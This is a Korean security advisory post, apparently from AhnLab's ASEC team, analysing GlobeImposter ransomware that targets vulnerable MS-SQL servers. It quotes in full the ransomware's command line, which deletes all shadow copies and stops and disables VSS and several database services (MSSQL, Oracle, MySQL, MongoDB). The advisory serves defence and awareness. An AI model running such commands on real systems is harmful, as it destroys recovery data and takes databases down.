MS-SQL 서버 취약점 뚫는 글로브임포스터 랜섬웨어 주의!

보안 이슈 2022-10-05

최근 안랩 ASEC 분석팀이 내부 모니터링을 통해 취약한 MS-SQL 서버를 표적으로 삼은 글로브임포스터(GlobeImposter) 랜섬웨어가 유포되고 있는 것을 확인했다. 글로브임포스터는 안랩 TIP 서비스의 ‘2022년 1, 2분기 MS-SQL 대상 악성코드 통계 보고서’에서도 언급된 바 있다. 올해 2분기에는 MS-SQL를 겨냥한 전체 랜섬웨어의 52.6%에 달했다. 조만간 공개될 3분기 통계에서도 큰 비중을 차지할 것으로 예상된다.

글로브임포스터는 암호화된 내부 데이터를 [그림 1]의 로직을 통해 실제 랜섬웨어 행위를 수행하는 [그림 2]의 DLL(Dynamic Link Library) 파일로 복호화한다. 그런 다음, 생성된 DLL 파일의 메서드(Method)를 델리게이트(Delegate) 함수를 사용해 호출한다. 여기서 DLL 파일이란 다른 프로그램에서 특정 작업을 수행하기 위해 호출할 수 있는 함수나 클래식 몇 변수가 들어있는 파일 형식을 말한다.

[그림 1] 복호화 로직

[그림 2] 복호화된 DLL 파일

[그림 3] 복호화된 DLL 파일 호출

해당 DLL 파일은 aspnet_compiler.exe 프로세스를 생성한 다음, 인젝션하여 랜섬웨어를 실행한다. 아래와 같이 파일이 복구되는 것을 막기 위해 섀도 복사본을 삭제하고, 데이터베이스 서비스를 종료한다. 참고로 섀도 복사본은 볼륨 스냅샷 서비스(Volume Snapshot Service)라고도 하는데, 특정 시점의 파일이나 폴더, 볼륨의 스냅샷 또는 수동 및 자동 복사본을 저장하는 기능으로 운영체제를 설치할 때 기본으로 활성화돼 있다.

C:\Windows\system32\cmd.exe /c @echo off sc config browser sc config browser start=enabled vssadmin delete shadows /all /quiet sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer sc config ReportServer start=disabled sc stop OracleServiceORCL sc config OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config OracleMTSRecoveryService start=disabled sc stop OracleVssWriterORCL sc config OracleVssWriterORCL start=disabled sc stop MySQL sc config MySQL start=disabled

[그림 4] RAPIT 프로세스 트리